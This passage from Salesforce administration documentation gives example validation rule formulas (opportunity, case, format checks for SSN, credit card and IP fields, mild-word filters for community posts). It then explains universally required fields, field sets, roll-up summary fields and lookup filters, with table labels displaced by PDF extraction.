Formula:

Cannot change opportunity products for closed opportunities.Error Message:

Top of PageError Location:

The following validation rule is on opportunities.

ValueField

Prevents users from deleting opportunity products after an
opportunity is closed. Create the following validation rule

Description:

example on opportunities. It uses a custom roll-up summary
field on opportunities that counts the number of opportunity
products on an opportunity.

AND(OR(ISPICKVAL(StageName, "Closed Won"),
ISPICKVAL(StageName, "Closed Lost")),

Formula:
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ValueField

Number_of_Line_Items__c <
PRIORVALUE(Number_of_Line_Items__c) )

Cannot delete opportunity products for closed opportunities.Error Message:

Top of PageError Location:

Prevent Saving a Case When Account Does Not Have Support

ValueField

Prevents users from saving a case for an account that does not
have support. This example assumes you have a custom

Description:

checkbox field on accounts called Allowed Support that
tracks if the account has support.

Account.Allowed_Support__c = FALSEFormula:

Unable to create cases for this account because it is not signed
up for support.

Error Message:

Top of PageError Location:

Prevent Saving a Case When Contact is No Longer with the Company

ValueField

Prevents users from saving an open case associated with a
contact that is no longer with the company. This example uses

Description:

a custom checkbox field on contacts called No Longer With
Company.

AND(Contact.Not_Longer_With_Company__c,
NOT(IsClosed))

Formula:

Unable to save this case because the related contact is no longer
with the company. To continue, choose another contact.

Error Message:

Contact NameError Location:

Community Validation Rules

Preventing Offensive Language in Questions

ValueField

Prevents users from entering offensive language in the Title and Description fields
when asking a question.

Description:
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ValueField

OR(CONTAINS(Title, 'darn'), CONTAINS(Body, 'darn'))Formula:

Question title or description contains offensive language.Error Message:

Preventing Offensive Language in Replies

ValueField

Prevents users from entering offensive language when replying to a question.Description:

OR(CONTAINS(Body, 'darn'), CONTAINS(Body, 'dang'))Formula:

Reply contains offensive language.Error Message:

Preventing Offensive Language in Ideas

ValueField

Prevents users from entering offensive language in the Title and Description fields
when posting an idea.

Description:

OR(CONTAINS(Title, 'darn'), CONTAINS(Body, 'darn'))Formula:

Idea title or description contains offensive language.Error Message:

Preventing Offensive Language in Idea Comments

ValueField

Prevents users from entering offensive language when posting a comment.Description:

OR(CONTAINS(CommentBody , 'darn'), CONTAINS(CommentBody, 'dang'))Formula:

Comment contains offensive language.Error Message:

Other Validation Rules

Allow Number to Be Increased but Not Decreased

ValueField

Allows a custom field called Commit Amount to be increased but not decreased after
initial creation. This rule uses the PRIORVALUE() function to compare the updated
value of the field to its value prior to update.

Description:
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ValueField

PRIORVALUE(Commit_Amount__c) > Commit_Amount__cFormula:

Commit Amount cannot be decreased.Error Message:

Commit AmountError Location:

California Driver's License

ValueField

Ensures that a custom field called Drivers License is in the correct A9999999 format
when the Mailing State is “CA”.

Description:

AND(
MailingState = "CA",

Formula:

NOT(REGEX(Drivers_License__c, "([A-Z]\\d{7})?"))
)

Invalid California driver's license format.Error Message:

Drivers LicenseError Location:

Force Users to Check “I Accept Terms” to Enter Certain Values

ValueField

Uses a checkbox labeled “I accept terms” to force the user to select a checkbox in order
to enter a value called Number of Days that exceeds their Paid Time Off (PTO)
balance available.

Description:

AND(
NOT( I_accept_terms__c ),

Formula:

Number_of_Days__c > $User.PTO_Balance__c
)

Request will cause a negative PTO balance. You must accept Negative PTO Balance
terms.

Error Message:

I accept termsError Location:

Prohibit Changes to a Field After It Has Been Saved

ValueField

Prevents users from changing a custom field called Guaranteed Rate after it has been
saved initially.

Description:

AND(
NOT( ISNEW() ),

Formula:

ISCHANGED( Guaranteed_Rate__c )
)
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ValueField

Guaranteed Rate cannot be changed.Error Message:

Guaranteed RateError Location:

Social Security Number Format

ValueField

Validates that a custom text field called SSN is formatted in 999-99-9999 number format
(if it is not blank). The pattern specifies:

Description:

• Three single digits (0-9):\\d{3}
• A dash
• Two single digits (0-9):\\d{2}
• A dash
• Four single digits (0-9):\\d{4}

NOT(
OR(

Formula:

ISBLANK(Social_Security_Number__c),
REGEX( Social_Security_Number__c , "[0-9]{3}-[0-9]{2}-[0-9]{4}")
)
)

SSN must be in this format: 999-99-9999.Error Message:

SSNError Location:

Valid Currency

ValueField

Validates selected currency against an explicit subset of active currencies in your
organization using the Currency picklist. Use this example if you only allow some of
the active currencies in your organization to be applied to certain types of records.

Description:

CASE(CurrencyIsoCode,
"USD", 1,

Formula:

"EUR", 1,
"GBP", 1,
"JPY", 1,
0) = 0

Currency must be USD, EUR, GBP, or JPY.Error Message:

CurrencyError Location:
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Valid Credit Card Number

ValueField

Validates that a custom text field called Credit_Card_Number is formatted in
9999-9999-9999-9999 or 9999999999999999 number format when it is not blank. The
pattern specifies:

Description:

• Four digits (0-9) followed by a dash: \\d{4}-
• The aforementioned pattern is repeated three times by wrapping it in () {3}
• Four digits (0-9)
• The OR character (|) allows an alternative pattern of 16 digits of zero through nine

with no dashes: \\d{16}

NOT( REGEX( Credit_Card_Number__c ,
"(((\\d{4}-){3}\\d{4})|\\d{16})?"))

Formula:

Credit Card Number must be in this format: 9999-9999-9999-9999 or
9999999999999999.

Error Message:

Credit Card NumberError Location:

Valid IP Address

ValueField

Ensures that a custom field called IP Address is in the correct format, four 3-digit
numbers (0-255) separated by periods.

Description:

NOT(
REGEX( IP_Address__c,

Formula:

"^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.)
{3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" ))

Error: IP Address must be in form 999.999.999.999 where each part is between 0 and
255.

Error Message:

IP AddressError Location:

Website Extension

ValueField

Validates a custom field called Web Site to ensure its last four characters are in an
explicit set of valid website extensions.

Description:

AND(
RIGHT( Web_Site__c, 4) <> ".COM",

Formula:

RIGHT( Web_Site__c, 4) <> ".com",
RIGHT( Web_Site__c, 4) <> ".ORG",
RIGHT( Web_Site__c, 4) <> ".org",
RIGHT( Web_Site__c, 4) <> ".NET",
RIGHT( Web_Site__c, 4) <> ".net",
RIGHT( Web_Site__c, 6) <> ".CO.UK",
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ValueField

RIGHT( Web_Site__c, 6) <> ".co.uk"
)

Web Site must have an extension of .com, .org, .net, or .co.uk.Error Message:

Web SiteError Location:

About Universally Required Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Connect Offline, Connect for Lotus Notes, Connect for Outlook, Salesforce for Outlook, the Self-Service portal,
Web-to-Lead, and Web-to-Case are not available in Database.com

.

A universally required field is a custom field that must have a value whenever a record is saved within Salesforce, the Force.com
API, Connect Offline, Connect for Lotus Notes, Connect for Outlook, Salesforce for Outlook, the Self-Service portal, or
automated processes such as Web-to-Lead and Web-to-Case. Making a field required on a page layout or through field-level
security ensures users must enter a value, but making a field required universally gives you a higher level of data quality beyond
the presentation level of page layouts.

You can make the following types of custom fields universally required:

• Currency

• Date

• Date/Time

• Email

• Master-Detail Relationship (always required)

• Number

• Percent

• Phone

• Text

• Text Area

• URL

To make a custom field universally required, select the Required checkbox when defining the custom field.

Note: You must specify a default value for required campaign member custom fields.

If you make a user field universally required, you must specify a default value for that field.
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Relationship group members do not support universally required fields.

See Also:
Considerations for Universally Required Fields

Considerations for Universally Required Fields

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects, Page Layouts, Connect Offline, Connect for Lotus Notes, Connect for Outlook, Salesforce for Outlook,
the Self-Service portal, Web-to-Lead, and Web-to-Cases are not available in Database.com

A universally required field is a custom field that must have a value whenever a record is saved within Salesforce, the Force.com
API, Connect Offline, Connect for Lotus Notes, Connect for Outlook, Salesforce for Outlook, the Self-Service portal, or
automated processes such as Web-to-Lead and Web-to-Case. Review the following considerations before making your custom
fields universally required.

• Standard fields cannot be universally required.

• Universally required fields are required across all record types.

• Edit pages always display universally required fields, regardless of field-level security.

• When designing your page layouts, universally required fields:

◊ Cannot be removed from a page layout

◊ Are automatically added to the end of the first section of a page layout if not already on it

◊ Cannot be read only or optional

◊ Display in bold, indicating they are always visible

◊ Are disabled on the field properties page because you cannot remove the required setting

• Universally required fields are only enforced during lead conversion if validation and triggers for lead conversion are enabled
in your organization.

• Quick Create does not enforce universally required fields.

• If you make an activity custom field universally required, you must also provide a default value.

• You must include universally required fields in your import files or the import will fail.

• Default values should not be assigned to fields that are both required and unique, as uniqueness errors may result.

• You cannot make a field universally required if it is used by a field update that sets the field to a blank value.

• Required fields may be blank on records that existed before making the field required. When a user updates a record with
a blank required field, the user must enter a value in the required field before saving the record.

See Also:
About Universally Required Fields

3002

About Universally Required FieldsEnhancing Your Objects, Data, and Fields



About Field Sets
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Note:  This release contains a beta version of field sets that is production-quality but has known limitations.

A field set is a grouping of fields. For example, you could have a field set that contains fields describing a user's first name,
middle name, last name, and business title. When a field set is added to a Visualforce page, developers can loop over its fields
and render them. If the page is added to a managed package, administrators can add, remove, or reorder fields in a field set
to modify the fields presented on the Visualforce page without modifying any code. The same Visualforce page can present
different sets of information, depending on which fields a subscriber prefers to keep.

As an administrator, you can create or edit field sets for your organization, or edit any installed field set. Field sets are available
on all standard objects that support custom fields, and any organization that supports creating Visualforce pages.

Fields added to a field set can be in one of two categories:

• If a field is marked as Available for the Field Set, it exists in the field set, but the developer hasn’t presented it
on the packaged Visualforce page. Administrators can display the field after the field set is deployed by moving it from the
Available column to the In the Field Set column.

• If a field is marked as In the Field Set, the developer has rendered the field on the packaged Visualforce page by
default. Administrators can remove the field from the page after the field set is deployed by removing it from the In the
Field Set column.

See Also:
Field Sets Required Bit
Creating Custom Fields
Developer's Guide: Visualforce Developer's Guide
Implementation guide: Force.com Quick Reference for Developing Packages.

Creating and Editing Field Sets

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Note:  This release contains a beta version of field sets that is production-quality but has known limitations.

Salesforce has a drag-and-drop WYSIWYG tool for creating and editing field sets The enhanced field sets editor is enabled
by default, and provides all of the functionality of the original editor, as well as additional functionality and an easier-to-use
WYSIWYG interface.

To create a new field set:
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1. Navigate to the field set list of the appropriate object:

• For standard objects, from Setup, click Customize, select the appropriate object from the Customize menu, and click
Field Sets.

• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list. Then click
New above the field sets related list.

2. Enter a Field Set Label. This is the name presented to subscribers who install the field through a managed package.
3. Enter a Field Set Name for your field set. This is used by your Visualforce page to reference the field set.
4. In the Where is this used? area, provide a brief description of which Visualforce pages use the field set, and for what

purpose. This information helps a subscriber understand where and how an installed field set is being used, so that they
can populate it with their own fields.

5. Click Save.
6. To add fields to the field set, drag the fields from the object palette and drop them into the Available for the Field

Set or the In the Field Set container. The fields in the Available for the Field Set container are not
initially visible on the Visualforce page. The fields within the In the Field Set container are visible by default on a
Visualforce page.

Note:  In the field set, you can span to fields that reference multiple objects. When you span a field into a field
set that references multiple objects, the only field you can span to is the Name object.

To move a field between the lists, drag and drop a field from one container to the other. The vertical order of the In the
Field Set list indicates the order of how the fields render on Visualforce pages.

7. To remove a field from the field set, drag the element back to the object palette, or click the  icon next to the element.

8. To make a field required, double click the element or click the wrench icon ( ) next to it and select the Required
checkbox.

Note:  Indicates the field is required and must have a value to save the record.

9. Click Save.

Important:  The total number of cross object spans within the In the Field Set container can't exceed 25.

After a field set is deployed in your organization, you can always mark fields that are in the Available for the Field
Set list as In the Field Set, or vice versa. To do so:

1. Find the field set that you want to edit. From Setup click Installed Packages, click on an installed package, and then click
on the field set you want to edit. Alternatively, if you know which object contains the field set you want to edit, go to the
object detail page and click Edit in the field set related list.

2. If you didn't create the field set initially, you'll only be able to edit the fields within the field set. To move fields between
containers, drag and drop a field from one container to the other. To change the order of a rendered field, drag a field up
or down the list and drop the field in the order you want it to appear.

3. Click Save.
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Field Sets Required Bit

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Note:  This release contains a beta version of field sets that is production-quality but has known limitations.

You can define a field as required when you create or edit field sets. You may want to define a field as required to ensure a
user enters the necessary information on a field. The required field is only available in the In the Field Set container. If
you define a field as required in the In the Field Set container, and remove the field from the In the Field Set,
the required attribute is removed.

To define a field as required in a field set, see Creating and Editing Field Sets on page 3003

See Also:
About Field Sets
Creating and Editing Field Sets

About Roll-Up Summary Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

While your formula fields calculate values using fields within a single record, roll-up summary fields calculate values from a
set of related records, such as those in a related list. You can create roll-up summary fields that automatically display a value
on a master record based on the values of records in a detail record. These detail records must be directly related to the master
through a master-detail relationship. For example, a custom account field called Total Invoice Amount displays the sum
of invoice amounts for all related invoice custom object records in the Invoices related list on an account.

You can perform different types of calculations with your roll-up summary fields. You can count the number of detail records
related to a master record, or calculate the sum, minimum value, or maximum value of a field in the detail records.

Before you begin creating roll-up summary fields for your organization, review the implementation tips and best practices.

Implementation Tips

Administration

• Create roll-up summary fields on:

◊ Any custom object that is on the master side of a master-detail relationship
◊ Any standard object that is on the master side of a master-detail relationship with a custom object
◊ Opportunities using the values of opportunity products related to the opportunity
◊ Accounts using the values of related opportunities
◊ Campaigns using campaign member status or the values of campaign member custom fields
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Note:  Campaign member custom formula fields that reference fields derived from leads or contacts are not
supported.

• The types of fields you can calculate in a roll-up summary field depend on the type of calculation. For example,

◊ Number, currency, and percent fields are available when you select SUM as the roll-up type.
◊ Number, currency, percent, date, and date/time fields are available when you select MIN or MAX as the roll-up type.

• You may not be able to change the field type of a field that you reference in a roll-up summary field.
• Make sure that the filter for your roll-up summary does not encounter a formula field that results in “#Error!”. If your filter

criteria uses a formula field that results in an error, no matches are returned for that filter criterion. For example, if your
roll-up summary filter is “Formula Field equals 10” and two records contain errors while one contains the value “10” in
that field, your summary only includes the record with the value “10.”

• Salesforce does not recalculate the value of campaign roll-up summary fields when leads or contacts are deleted. Select the
Force a mass recalculation on this field option on the edit page of a campaign roll-up summary field to
manually recalculate the value.

• Long text area, multi-select picklist, Description, system fields like Last Activity, cross-object formula fields, and
lookup fields (such as the Product Code field) cannot be used in the field column of roll-up summary filters.

• Auto number fields are not available as the field to aggregate in a roll-up summary field.
• After you have created a roll-up summary field on an object, you cannot convert the object's master-detail relationship into

a lookup relationship.
• Roll-up summary fields are not available for mapping lead fields of converted leads.

Management

• Roll-up summary fields can calculate the values of formula fields if they do not contain cross-object field references or
functions that automatically derive values on the fly, such as NOW or TODAY.

Note:  The value of a formula field can result in “#Error!”, which affects the summarized total. If your roll-up
summary type is COUNT, records are included regardless of whether they contain a formula field with an error,
but when the Field to Aggregate is a formula field that results in “#Error!”, calculations of type MIN, MAX,
and SUM exclude those formula values.

• Changes to the value of a roll-up summary field can trigger assignment rules to run. If a roll-up summary field is part of
the criteria in an assignment rule, the field's new value is used to evaluate if the record should be reassigned.

• Roll-up summary fields can trigger workflow rules and field validations. However, workflow rules and field validations do
not fire when the following changes cause a mass recalculation of roll-up summary values:

◊ Changing the roll-up summary definition (such as the object, function, or field being aggregated)
◊ Changing the expression of a formula field referenced in a roll-up summary field
◊ Replacing picklist values for picklist fields referenced in the roll-up summary filter
◊ Changing picklist record type definitions
◊ Changing currency conversion rates
◊ Changing price book entries

• Calculating roll-up summary field values may take up to 30 minutes, depending on the number of records affected and
other factors.

• You are not prevented from creating roll-up summary fields that might result in invalid values, such as February 29th in
a non-leap year. If an existing roll-up summary field results in an invalid value, the value is not recalculated , and the field
will continue to display with an invalid roll-up summary icon ( ) until you change the values being summarized.

• If your organization uses multiple currencies, the currency of the master record determines the currency of the roll-up
summary field. For example, if the master and detail records are in different currencies, the values in the detail record are
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converted into the currency of the master record before calculating the final value and displaying it in the same currency
as the master record.

• If your organization has advanced currency management enabled, currency roll-up summary fields are invalid if they are
on accounts and summarizing opportunity values, or on opportunities and summarizing custom object values.

• Salesforce will prevent users from saving a record when doing so would invalidate a related record. For example, if the
related master record has a validation rule that requires the roll-up summary field value to be greater than 100, and the
user's change to the child record will put the value over 100, the user will not be able to save the record.

• If a lookup field references a record that has been deleted, Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being deleted if they’re in a lookup relationship.

Best Practices

• Apply field-level security to your roll-up summary fields if they calculate values that you do not want visible to users. Fields
that your users cannot see due to field-level security settings on the detail record are still calculated in a roll-up summary
field.

• If you have validation rules, consider how they affect roll-up summary fields. A validation error can display when saving
either the detail or master record because the value in a roll-up summary field changes when the values in the detail records
change.

• Because roll-up summary fields are not displayed on edit pages, you can use them in validation rules but not as the error
location for your validation.

• Avoid referencing a roll-up summary field from a child record. The roll-up summary field will have the previous value
because the parent record has not been updated. If you reference a roll-up summary field from a parent record, the roll-up
summary field will always have the new value because that rule runs after the parent value has been updated.

If you are trying to enforce a record limit of 25 on the parent roll-up summary field, when you add a new child record,
your validation rule on the child object needs to check if the count is already 25 or greater.

AND(ISNEW(), Sample.Line_Count__c >= 25)

• Plan your implementation of roll-up summary fields carefully before creating them. Once created, you cannot change the
detail object selected or delete any field referenced in your roll-up summary definition.

• Roll-up summary fields are affected by advanced currency management. If your organization enables advanced currency
management, delete any currency roll-up summary fields on accounts that summarize opportunity values or on opportunities
that summarize custom object values. Otherwise, the fields continue to display with an invalid roll-up summary icon because
their values are no longer calculated.

• Automatically derived fields such as current date or current user are not allowed in roll-up summary fields. This includes
formula fields containing functions that automatically derive values on the fly, such as DATEVALUE, NOW, and
TODAY. Formula fields that include related object merge fields are also not allowed in roll-up summary fields.

See Also:
Defining Roll-Up Summaries
Creating Custom Fields
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Defining Roll-Up Summaries

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view roll-up summary field definitions:

“Customize Application”To edit roll-up summary field definitions:

Define roll-up summary fields on the object that is on the master side of a master-detail relationship. If a relationship does
not already exist, first create a master-detail relationship between the master object that displays the value and the detail object
containing the records you are summarizing.

To define a roll-up summary field:

1. Create a custom field on the object where you want the field displayed. Summary fields summarize the values from records
on a related object, so the object on which you create the field should be on the master side of a master-detail relationship.
For instructions on creating a custom field, see Creating Custom Fields on page 2922.

2. Choose the Roll-Up Summary field type, and click Next.
3. Enter a field label and any other attributes. Click Next.
4. Select the object on the detail side of a master-detail relationship. This object contains the records you want to summarize.
5. Select the type of summary:

DescriptionType

Totals the number of related records.COUNT

Totals the values in the field you select in the Field to Aggregate option. Only number, currency,
and percent fields are available.

SUM

Displays the lowest value of the field you select in the Field to Aggregate option for all
directly-related records. Only number, currency, percent, date, and date/time fields are available.

MIN

Displays the highest value of the field you select in the Field to Aggregate option for all
directly-related records. Only number, currency, percent, date, and date/time fields are available.

MAX

6. Enter your filter criteria if you want a selected group of records in your summary calculation. If your organization uses
multiple languages, enter filter values in your organization's default language.

7. Click Next.
8. Set the field-level security to determine whether the field should be visible for specific profiles, and click Next.
9. Choose the page layouts that should display the field. The field is added as the last field in the first two-column section

on the page layout. For user custom fields, the field is automatically added to the bottom of the user detail page.
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10. Click Save to finish or Save & New to create more custom fields.

See Also:
About Roll-Up Summary Fields

About Lookup Filters
Available in: All Editions except for Database.com.

User Permissions Needed

“Customize Application”To manage lookup filters:

Improve user productivity and data quality with lookup filters.

Lookup filters are administrator settings that restrict the valid values and lookup dialog results for lookup, master-detail, and
hierarchical relationship fields. Administrators specify the restrictions by configuring filter criteria that compare fields and
values on:

• The current record (source)

• The lookup object (target)

• The user's record, permissions, and role

• Records directly related to the target object

For example, you can:

• Restrict the Account Name field on opportunities to allow only accounts with a record type of Customer, filtering out
Partner and Competitor.

• Restrict the Account Name field on opportunities to allow only active accounts.

• Restrict the Contact field on cases to allow only contacts associated with the account specified in the Account Name
field on the case record.

• Restrict the Account Name field on cases to allow only users with the “International Sales” profile to create or edit cases
for accounts outside the United States.

Tip:  When you define a lookup filter, optionally click Insert Suggested Criteria to choose from a list of
lookup filter criteria that Salesforce suggests based on the relationships between objects in your organization.

Administrators can make lookup filters required or optional.

• For fields with required lookup filters, only values that match the lookup filter criteria appear in the lookup dialog. Also,
users can't save invalid values manually typed in the field when editing the record. If a user tries to save an invalid value,
Salesforce displays an error message, which administrators can customize.

• For fields with optional lookup filters, only values that match the lookup filter criteria appear in the lookup dialog initially;
however, users can click the Show all results link in the lookup dialog to remove the filter and view all search result values
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for the lookup field. Also, optional lookup filters allow users to save values that don't match the lookup filter criteria, and
Salesforce does not display an error message if a user tries to save such values.

See Also:
Notes on Lookup Filters
Lookup Filter Examples
Tip sheet: Creating Lookup Filters on Relationship Fields

Defining Lookup Filters

Available in: All Editions except for Database.com.

User Permissions Needed

"Customize Application"To define lookup filters:

To define a lookup filter:

1. You can create lookup filters for new relationship fields in step 3 of the custom field wizard. To create a lookup filter on
an existing field:

a. Navigate to the fields area of the object that contains the relationship field:

• For standard objects, from Setup, click Customize, select the appropriate object from the Customize menu, and
click Fields.

• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

b. Click Edit next to the name of the lookup or master-detail relationship field to which you want to apply the filter.

2. In the Lookup Filter Options section, click Show Filter Settings.
3. Specify the filter criteria a record must meet to be a valid value. To specify criteria, click Insert Suggested Criteria

and choose from a list of suggested criteria, or manually enter your own criteria. To enter your own criteria:

a. In the first column, click the lookup icon or start typing in the text box and select a field.
b. In the second column, select an operator.
c. In the third column, select Value if Salesforce should compare the field in the first column with a static value, or select

Field if Salesforce should compare the field in the first column with the value of another field.
d. In the fourth column, enter the value or select the field that Salesforce should compare with the field in the first column.

Note:

• Click Add Filter Logic to add Boolean conditions.
• You can select from fields on the current record, the lookup object, or the user record. You can also choose

related fields that are one relationship away from the lookup object. Salesforce assists you by listing the available
fields and relationships when you click the lookup icon or click inside the text boxes.

• Lookup filter criteria can compare fields of different types as long as they are compatible.
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4. Specify whether the filter is required or optional. For fields with optional lookup filters, only values that match the lookup
filter criteria appear in the lookup dialog initially; however, users can click the Show all results link in the lookup dialog
to remove the filter and view all search result values for the lookup field. Also, optional lookup filters allow users to save
values that don't match the lookup filter criteria, and Salesforce does not display an error message if a user tries to save
such values.

For required lookup filters, specify whether you want Salesforce to display the standard error message or a custom message
when a user enters an invalid value.

5. Optionally, enter text to display in the lookup search dialog. Consider text that guides users in their searches and explains
the business rule that the lookup filter implements.

6. Leave Active selected.
7. Click Save.

Important: When creating a lookup filter on a master-detail relationship field, verify that the current values of the
field on all of the detail records meet the criteria you specify. If you specify criteria that an existing value doesn't meet,
Salesforce prevents the user from saving changes to the detail record. If this occurs, the user must first modify the
value on the master record to meet the criteria. For example, consider a custom object with a master-detail relationship
field that points to accounts. If you define a lookup filter that excludes all accounts with a Create Date before
01/01/2009, verify that no existing records of that custom object have a master-detail relationship with any account
created before 2009. A quick way to do this is to create a report that shows all accounts with a Create Date before
01/01/2009.

If at some point you no longer need this lookup filter, return to this page and do one of the following:

Deactivate the lookup filter

Deactivating a lookup filter preserves the lookup filter configuration but:
• Prevents it from applying to the relationship field

• Prevents it from impacting the cross-object references limit

• Removes it as a dependency for fields referenced in the lookup filter criteria

To deactivate the lookup filter, deselect Active, then click Save.

Delete the lookup filter

Deleting a lookup filter permanently removes it. You cannot recover deleted lookup filters. To delete the lookup filter,
click Clear Filter Criteria, then click Save.

Viewing a List of Lookup Filters for a Target Object

You can quickly see a list of all of the lookup filters that restrict the values of each target object. This is useful when creating
similar filters for a target object. Also, lookup filters that reference fields on related objects count against the cross-object
reference limit, which is the number of unique relationships allowed for a target object. The Related Lookup Filters list lets
you see which lookup filters might impact that limit. To see which lookup filters affect the limit for a particular target object:

• For standard objects, from Setup, click Customize, select the object from the Customize menu, and click Related Lookup
Filters.
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• For custom objects, from Setup, click Create > Objects, select one of the custom objects in the list, and scroll to the Related
Lookup Filters related list.

See Also:
Notes on Lookup Filters
About Dependent Lookups
Lookup Filter Examples
Tip sheet: Creating Lookup Filters on Relationship Fields

About Dependent Lookups

Available in: All Editions

User Permissions Needed

“Customize Application”To manage dependent lookups:

A dependent lookup is a relationship field with a lookup filter that references fields on the source object. For example, you can
configure the case Contact field to only show contacts associated with the account selected in the case Account Name field.

When a user changes the value of a referenced field on the source object, Salesforce immediately verifies that the value in the
dependent lookup still meets the lookup filter criteria. If the value doesn't meet the criteria, an error message is displayed and
users can't save the record until the value is valid.

If the referenced field on the source object is a lookup, master-detail, or hierarchy field, users can't change its value by typing.
Instead, users must click the lookup icon and select a value in the lookup search dialog.

Tip: Dependent lookups are supported in Visualforce pages.

See Also:
Defining Lookup Filters
Lookup Filter Examples
Tip sheet: Creating Lookup Filters on Relationship Fields
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Notes on Lookup Filters

Available in: All Editions except for Database.com.

User Permissions Needed

“Customize Application”To manage lookup filters:

Best Practices

Custom Help
Define custom help for fields with lookup filters to let users know about the business rule the filter enforces. For example,
if the lookup filter restricts the Account Name on opportunities to only allow active accounts, define custom help that
states You can only associate active accounts with opportunities.

Error Messages
Customize lookup filter error messages to guide users who type invalid values. For example, if the lookup filter restricts
the Account Name on opportunities to only allow active accounts, define an error message that states Value doesn't
exist or isn't an active account.

Important: Salesforce translates the standard error message for required lookup filters, but not custom error
messages. Use the Translation Workbench to translate lookup filter custom error messages. To restore the
standard error message after modifying it, click Reset to default message.

Profile-Based Lookup Filters
Use Current User Profile: ID in filter criteria to define different filter criteria for different users, or to let
administrators enter values that don't match the criteria. Avoid using Current User Profile: Name due to
technical limitations on standard profiles.

Record IDs vs. Record Names
To reference a specific record in filter criteria, use the ID of the record instead of its name. IDs are always unique whereas
names are not.

Testing
After creating a lookup filter, test it to make sure it is not too restrictive. Depending on their permissions, some users
may have read-only access to some relationship fields; ensure your lookup filters don't prevent those users from editing
records critical to their job functions.

Dependent Lookups on Page Layouts and Mini Page Layouts in the Console
When designing page layouts with dependent lookups:
• If a dependent lookup is above its controlling field on a layout, make its lookup filter optional or redesign the layout.

Moving a required dependent lookup above its controlling field may confuse users who typically start from the top
of a page when entering data.

• Ensure that both the controlling and dependent fields are visible so users can correct invalid values.
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Lookup Filters and the Lookup Filter Fields Search Layout
Do not reference the same fields in both lookup filter criteria and the Lookup Filter Fields search layout. Users might
assume that results from their custom search override administrator-controlled lookup filters.

Implementation Notes

• Salesforce supports lookup filters on relationship fields that point to:

◊ Accounts
◊ Assets
◊ Contacts
◊ Entitlements
◊ Quotes
◊ Service contracts
◊ Users
◊ Custom objects

For example, you can define a lookup filter on opportunities that points to accounts, but not vice-versa.
• Lookup filter criteria can compare fields on the source object with different types of fields on the target object as long as

the fields are compatible.

Compatible Target Object Field TypesSource Object Field Type

Currency, Roll-Up SummaryCurrency

Date, Date/Time, Roll-Up SummaryDate

Date, Date/Time, Roll-Up SummaryDate/Time

Hierarchy, Lookup, Master-DetailHierarchy

Hierarchy, Lookup, Master-DetailLookup

Lookup, Hierarchy, Master-DetailMaster-Detail

Number, Percent, Roll-Up SummaryNumber

Number, Percent, Roll-Up SummaryPercent

Text, Text Area, Email, URLPicklist

Currency, Number, Date, Date/Time, Roll-Up SummaryRoll-Up Summary

• Lookup filter criteria cannot reference the following types of fields on the source object:

◊ Autonumber
◊ Encrypted
◊ Formula
◊ Long text area
◊ Multi-select picklist
◊ Roll-up summary
◊ Text
◊ Text area
◊ URL
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• On the Fields page, the  icon indicates all fields with active lookup filters. The  icon indicates that the lookup filter
is required.

• If you enter Current User Profile: Name or Profile: Name in the Field column of your lookup filter criteria,
Salesforce displays a lookup icon in that row. Click the lookup icon to select from a list of existing profiles rather than
typing profile names.

• The lookup filters you create in Salesforce also appear in the partner portal and Customer Portal.
• Lookup filters are case-sensitive.
• If you convert a required lookup filter with a custom error message to optional, Salesforce deletes the message.
• If you create a lookup filter that invalidates an existing value for that field, the value persists; however, when a user edits

the record, Salesforce displays an error message and requires the user to change the invalid value before saving.
• Salesforce prevents you from saving changes that cause required lookup filters on related records to contain invalid values.
• Lookup auto-completion doesn’t work for user lookups with additional drop-down lists. This is primarily for organizations

that have set up either a partner portal or Customer Portal.
• Versions 16.0 and higher of the Salesforce API support lookup filters. Lookup filters are enforced when you load data

through the API.
• If you configure a lookup filter to show inactive users only, the relationship field has no valid options because inactive users

are never valid for relationship fields that point to the User object.
• In enhanced list views, you cannot change fields that are referenced by a dependent lookup filter criteria.
• Lookup filters do not support mass owner changes. If your lookup filter criteria reference the Owner field, performing a

mass owner change can result in incorrect values that won't be noticed until you attempt to save the record.
• A lookup filter can’t reference a formula, if the formula references global merge fields that aren’t supported by the lookup

filter.
• If you create a filtered lookup on a field that looks up to another object, both objects must be deployed into the organization

at the same time.
• Salesforce does not display an error message if the value of a controlling field invalidates the value of a dependent

master-detail relationship field.
• Salesforce does not support inline editing in list views for:

◊ Fields on the source object that are referenced in dependent lookups.
◊ Fields with dependent lookups.

• Dependent lookups are supported in Visualforce pages.

Spanning Relationships in Lookup Filters

Filter criteria can include fields directly related to the target object (one level only). For example, on a lookup field pointing
to contacts, a lookup filter can reference fields on the account related to the contact via the Account Name relationship field.
The lookup field can also reference fields on the contact related to the contact via the Reports To relationship field.

For required lookup filters, each field referenced on a related lookup object counts against the number of unique relationships
allowed for the referenced object, not the source object. For example, the two unique relationships described above count
against the number allowed for the Contact object. Optional lookup filters don't count against the limit on the number of
unique relationships allowed per object.

To see which lookup filters affect the limit for a particular target object:

• For standard objects, from Setup, click Customize, select the object from the Customize menu, and click Related Lookup
Filters.

• For custom objects, from Setup, click Create > Objects, select one of the custom objects in the list, and scroll to the Related
Lookup Filters related list.
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Lookup Filters vs. Validation Rules

Validation rules and lookup filters achieve similar ends, but offer different advantages. Use a lookup filter if:

• You want to improve user efficiency by limiting the number of available options in a lookup search dialog.
• You want to improve user efficiency by automating filters on lookup search dialogs that your users manually set.

Use a validation rule if:

• You're close to the maximum number of lookup filters allowed.
• You must implement a complex business rule that requires you to use a formula. Formulas can reference fields that basic

filter criteria can't reference, such as fields on the parent of the source object. Formulas can also use functions. For example,
use ISNEW if the rule should only apply on record creation, or ISCHANGED if the rule should apply when a field changes.

Other Limitations

• Lookup filter criteria can reference fields on accounts, assets, contacts, entitlements, quotes, service contracts, users, and
custom objects, with the following exceptions:

◊ Relationship fields on activities
